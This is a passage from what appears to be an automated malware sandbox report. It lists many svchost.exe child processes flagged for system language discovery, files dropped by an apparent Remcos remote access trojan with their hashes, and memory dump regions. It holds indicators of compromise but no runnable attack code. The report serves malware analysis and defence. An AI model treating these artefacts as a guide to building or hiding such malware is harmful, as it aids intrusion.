              5⤵
              • System Location Discovery: System Language Discovery
              PID:2744
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1524
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1056
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2156
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1160
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2416
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2428
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2280
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1004
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2524
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2344
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2136
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1140
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2760
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:716
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1280
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2748
            • C:\Windows\SysWOW64\svchost.exe
              svchost.exe
              5⤵
              • System Location Discovery: System Language Discovery
              PID:2596

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\logs.dat
      Filesize

      144B

      MD5

      93ee1af126005e02e218591b0c44e98d

      SHA1

      396774baeb08179bdb5c0862017331cdbef5e665

      SHA256

      7b50ec4e8a819906935485c8264d5504a80d6287798bf107b2ad2d6184295953

      SHA512

      3863e52a14d76b1f3601ff54c7b9305508398cca65b1f0601ac5cb2ed2328b96227195c3a25ca64eca64b452ccc214200ace8ca42a1aecaec68b4448a649a866

      Download Submit

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
      Filesize

      342B

      MD5

      58bf9abb46287ead3fc2b120fb6bc3da

      SHA1

      b0acfa296f41e5f6e1e1d6ec62e30824e041777b

      SHA256

      cc1f2d8efe5a1ff259c4c87cb6a9a53faf120c5dbbbfab9ee2a56a0cb0a81716

      SHA512

      44ece725e649e98f49d9bf9967f7794992657596edbf6de70fecc6f6ecc410d2261d38079c33ef0f82c3bc5d68e076692dd8db0be4b64e32a72863b530d1b967

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\Cab426F.tmp
      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\TarB443.tmp
      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Depraves.Ter
      Filesize

      462KB

      MD5

      fab4848cb34a94460623a50992cd5123

      SHA1

      1e1865b6c2993aa6f38b79bc1425930cc85ec72f

      SHA256

      fff355b9b7741451cdd93e4f9e4af51c95db79807b0c0286aa666965a2a71ead

      SHA512

      a08c1a7a0bc4a33b3aefdb1550d6b0ae88851f6cb01a0c1eebe6b64dcb854cd937d87f8d97a8171babfd72d6b4bb32926c983c0f5a24f7b9c6afdf5045775b71

      Download Submit

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\55ORGP8FBCFH7TCP23N4.temp
      Filesize

      7KB

      MD5

      0cec6e4c180c2f84b3f13931a5891ade

      SHA1

      580ebde75c763f740485d5f157718776a38ad5f1

      SHA256

      38a18b68ede1ae2836afd969eff7368c35c26920b449480a0567e05aa0ef5a5b

      SHA512

      928b3b7f14080a2bf062d385b0f988a7d2154b7d14e05aeb52198005ff08daa283e78bab9e0f276d034bdd6ed0ea48bc89ef82d461a004aa73ba43f8143ef7f3

      Download Submit

    • memory/1020-60-0x0000000000080000-0x0000000000100000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1020-61-0x0000000000080000-0x0000000000100000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1020-59-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1248-83-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1272-98-0x0000000000100000-0x0000000000180000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1272-99-0x0000000000100000-0x0000000000180000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1272-97-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1464-93-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1556-129-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1648-102-0x0000000000170000-0x00000000001F0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1648-103-0x0000000000170000-0x00000000001F0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1700-86-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1748-76-0x00000000000D0000-0x0000000000150000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1748-75-0x00000000000D0000-0x0000000000150000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1748-74-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1892-122-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1892-123-0x00000000000E0000-0x0000000000160000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1892-124-0x00000000000E0000-0x0000000000160000-memory.dmp

      Filesize

      512KB

      Download

    • memory/1948-126-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2060-34-0x00000000066F0000-0x0000000009894000-memory.dmp

      Filesize

      49.6MB

      Download

    • memory/2188-58-0x0000000001D60000-0x0000000004F04000-memory.dmp

      Filesize

      49.6MB

      Download

    • memory/2240-120-0x00000000001C0000-0x0000000000240000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2240-121-0x00000000001C0000-0x0000000000240000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2240-119-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2256-67-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2360-108-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2420-66-0x0000000000180000-0x0000000000200000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2420-65-0x0000000000180000-0x0000000000200000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2420-64-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2448-104-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2448-106-0x0000000000130000-0x00000000001B0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2448-105-0x0000000000130000-0x00000000001B0000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2472-79-0x00000000001A0000-0x0000000000220000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2472-80-0x00000000001A0000-0x0000000000220000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2504-115-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2504-116-0x0000000000110000-0x0000000000190000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2504-117-0x0000000000110000-0x0000000000190000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2560-90-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2720-28-0x000007FEF66B0000-0x000007FEF704D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2720-26-0x000007FEF66B0000-0x000007FEF704D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2720-20-0x000007FEF696E000-0x000007FEF696F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2720-21-0x000000001B4C0000-0x000000001B7A2000-memory.dmp

      Filesize

      2.9MB

      Download

    • memory/2720-29-0x000007FEF696E000-0x000007FEF696F000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2720-62-0x000007FEF66B0000-0x000007FEF704D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2720-22-0x00000000029E0000-0x00000000029E8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/2720-23-0x000007FEF66B0000-0x000007FEF704D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2720-25-0x000007FEF66B0000-0x000007FEF704D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2720-24-0x000007FEF66B0000-0x000007FEF704D000-memory.dmp

      Filesize

      9.6MB

      Download

    • memory/2860-133-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2872-112-0x0000000000090000-0x0000000000110000-memory.dmp

      Filesize

      512KB

      Download

    • memory/2872-111-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/2872-113-0x0000000000090000-0x0000000000110000-memory.dmp

      Filesize

      512KB

      Download

    • memory/3004-71-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

      Filesize

      4KB

      Download